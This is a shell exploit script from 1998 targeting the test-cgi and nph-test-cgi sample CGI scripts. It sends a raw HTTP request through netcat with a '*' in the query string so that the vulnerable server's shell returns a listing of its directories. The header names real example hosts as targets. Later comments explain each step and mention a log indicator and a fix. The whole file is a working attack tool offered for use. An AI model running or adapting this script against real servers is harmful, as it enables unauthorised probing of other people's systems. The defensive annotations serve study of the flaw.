#!/bin/sh
#
# test-cgi '98 by Jimmy J
#
# Required:
#  nc (netcat) ftp://ftp.avian.org/src/hacks/nc110.tgz
#
# Example:
#  test-cgi www1.mailbox.co.uk
#  test-cgi www.netbenefit.co.uk:8080 /
#
#  test-cgi www2.netlink.co.uk:80/cgi-bin/nph-test-cgi /etc/
#
# Problem:
# In old versions $QUERY_STRING is expanded without double quotes, which
# allows wildcard (glob) expansion.
#
# Impact:
# An attacker can remotely list directories on the victim machine.
#
# Notes:
#
# This script shoves a * into $QUERY_STRING which gets expanded by sh
# to the directory contents, basically doing an "echo *".
#
# nph-test-cgi is vulnerable to the same problem.
#
# I didn't see anyone release anything useful for the test-cgi hole so here
# it is.
#
# Later.
#

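# Print the usage line to stderr and exit with status 1.
# Reads $0 only to derive the program name; takes no arguments and does
# not return.
usage() {
	# ${0##*/} is the POSIX parameter-expansion equivalent of `basename "$0"`
	# without the fork and without the word-splitting of the unquoted $0.
	# printf prints the fixed format verbatim (no echo flag/backslash quirks).
	printf 'Usage: %s <host>[:port/cgi-bin/nph-test-cgi] [/directory/]\n' "${0##*/}" >&2
	exit 1
}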

# Positional arguments: $1 is host[:port[/cgi-path]], $2 is an optional
# directory prefix. Both are used unquoted below, so values containing
# spaces or glob characters will not survive the parsing as written.
victim=$1
port=80

# No host at all: print usage and exit 1.
if [ -z "$victim" ]; then
	usage
fi

# Default CGI path; overridden only when $1 carries a "/" after the port
# (the header's third example selects nph-test-cgi this way).
cgi=/cgi-bin/test-cgi

# Split host[:port[/path]]: a ":" selects a non-default port, and a "/"
# after it replaces the whole CGI path with everything after the first "/".
# $victim ends up as the bare host in both branches.
if echo $victim | grep ":" 1>/dev/null; then
	if echo $victim | grep "/" 1>/dev/null; then
		port="`echo $victim | cut -f1 -d "/" | cut -f2 -d ":"`"
		cgi="/`echo $victim | cut -f2- -d "/"`"
		victim=`echo $victim | cut -f1 -d ":"`
	else
		port=`echo $victim | cut -f2 -d ":"`
		victim=`echo $victim | cut -f1 -d ":"`
	fi
fi

directory=$2

# $directory is unquoted here: when it is empty the test collapses to
# `[ -z ]`, which is true for the one-argument form, so the default label
# is still chosen; it only works by accident.
if [ -z $directory ]; then
	remotedir="current directory"
else
	remotedir=$directory
fi

# Progress line for the operator; the embedded "$remotedir" quoting is
# harmless inside the outer double quotes.
echo "Trying $victim:$port$cgi... ["$remotedir"]"
# One raw HTTP/1.0 GET piped into nc (-v reports the connection on stderr).
# The query string is `' <directory>* '`: the header explains that the
# vulnerable test-cgi / nph-test-cgi echoes $QUERY_STRING unquoted, so the
# shell expands the "*" into a directory listing that comes back in the
# response body. The empty line before the closing quote is the blank line
# that terminates the HTTP headers; the User-Agent/Referer lines merely
# imitate a Lynx browser.
# Defender's view: a literal "*" (or "?") in the query string of a request
# to these sample CGIs is the useful access-log indicator, not the UA. The
# mitigation is the quoting fix the header describes ("$QUERY_STRING") or
# removing the sample CGI scripts from production servers.
echo "GET $cgi?' $directory* ' HTTP/1.0
Host: $victim
Accept: text/html, text/plain, application/x-wais-source, */*
User-Agent: Lynx/2.5  libwww/2.14
Referer: http://$victim/

" | nc -v $victim $port 


